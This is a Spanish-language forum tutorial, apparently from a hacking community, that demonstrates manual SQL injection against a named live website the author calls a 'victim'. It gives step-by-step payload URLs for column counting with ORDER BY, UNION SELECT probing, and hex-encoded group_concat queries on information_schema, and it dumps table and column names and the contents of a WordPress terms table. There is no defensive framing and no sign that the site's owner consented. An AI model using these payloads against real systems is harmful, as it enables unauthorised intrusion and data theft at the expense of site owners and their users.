-XSS(CROSS SITE SCRIPTING)
-RCE (REMOTE CODE EXECUTE)(REMOTE COMMAND EXECUTION)
-JFI (JPG FILE INCLUSIÓN)
-LDAP (LIGHTWEIGHT DIRECTORY ACCESS PROTOCOL)(Acessos a directorios)

Después en otros post les explicare estas vulnerabilidades, bueno vamos a lo qué venimos.

Como verán yo ya tengo mi web victima y es la siguiente:

Url:

Código: [Seleccionar]
http://pragmasys.in/career-details-2/?jobid=7


Okey entonces comenzaremos las Columnas con "order by --" claro sin las comillas para esto necesitariamos el complemento HackBar al final del post se los pasaré. Okey otra cosa a veces nos saldra Unkown Column, a veces nos aparecerá errores y aveces nos saldrá nada ya qué es normal, okey entonces comenzemos, colocaremos order by 30-- haber qué es lo que nos aparecera, otra cosa cuando sea la columna indicada nos aparecera la página comun y corriente como estaba.

Okey entonces colocaremos lo siguiente:

Url:

Código: [Seleccionar]
http://pragmasys.in/career-details-2/?jobid=7 order by 30--


Error ahora probaremos con order by 5--

Url:

Código: [Seleccionar]
http://pragmasys.in/career-details-2/?jobid=7 order by 5--
Foto:



Como vemos igúal nos da error significa que aún está no es la columa ahora probemos con order by 4--

Url:

Código: [Seleccionar]
http://pragmasys.in/career-details-2/?jobid=7 order by 4--


Okey y como verán esta es la columna !!, okey entonces ahora haremos lo siguiente para comenzar a sacar la BD(BASE DE DATOS) colocaremos "UNION SELECT 1,2,3,4--" claro sin las comillas antes de todo también es obligatorio cuando vayamos a sacar una base de datos manualmente colocar un signo menos "-" sin las comillas antes del php?id=-2 es un ejemplo y si no lo pondremos nos saldria error okey entonces quedaría así.

Url:

Código: [Seleccionar]
http://pragmasys.in/career-details-2/?jobid=-7 UNION SELECT 1,2,3,4--
Foto:



Okey y como vemos nos aparecero dos números eso es normal no es ningún error y algunos se preguntaran esto.

¿Cuál número elegiremos?

Elegiremos el número qué está mas subrayado de color negro osea el negro a veces nos aparecerá más de un número subrayado eso es normal elegiremos cualquier de esos números subrayados solo uno, okey entonces ahora pondremos lo siguiente borraremos el número "2" y pondremos lo siguiente.

Url:

Código: [Seleccionar]
http://pragmasys.in/career-details-2/?jobid=-7 UNION SELECT 1,group_concat(0x3c62723e,table_name),3,4 from information_schema.tables where table_schema=database()--
Foto:



Y como ven esa es la base de datos algunos se preguntaran algunos no por qué no les interesara.

¿Donde salio este número 3c62723?

Realmente ese número es el código de HTML <br> para separar los parrafos no están importante pero saldrá más ordenado , está encryptado, ¿y comó lo encrypte? muy facil vamos a la barra de HackBar donde dice Encoding >> Hex Encoding >> String to 00ff00ff y otra cosa ese 0x no significa nada pero es importante ponerlo.

Foto:



Okey ya haber sacado la base de datos colocaremos lo siguiente para sacar las columnas otra cosa yo seleccionare la columna wp_terms, la verdad el administrador de la web ha estado muy atento a la web y ha borrado la base de datos de los usuarios, bueno entonces nos quedaría así.

Url:

Código: [Seleccionar]
http://pragmasys.in/career-details-2/?jobid=-7 UNION SELECT 1,group_concat(0x3c62723e,column_name),3,4 from information_schema.columns where table_name=0x77705f7465726d73--
Foto:



Y esas serían las columnas, entonces de nuevo se estarían preguntando, ¿de donse salío ese 77705f7465726d73?, púes como les escirbir ahora es el nombre de la colúmna pero encryptado es el mismo metodo como encrypte el código <br> no hay nada de diferencia, okey yo seleccionare todas las colúmnas y nos quedaría así.

Url:

Código: [Seleccionar]
http://pragmasys.in/career-details-2/?jobid=-7 UNION SELECT 1,group_concat(0x3c62723e,term_id,0x3d,name,0x3d,slug,0x3d,term_group),3,4 from wp_terms--



Okey y como verán esas serán las columnas otra cosa también se preguntaran para que es ese ¿0x3d? ese 0x3d es para que no nos salga error al sacar las columnas y también se preguntaran como desencrypto el nombre de la tabla de la ¿columna? muy facil vamos a:

Encoding >>  HEX Encoding >> HEX to Characters

Foto:



Bueno espero qué hayan entendido mis lectores ! y en mi próximo post será una sorpresa más grande !, adios!.
Creditos Veneno por la página web.



Páginas: [1]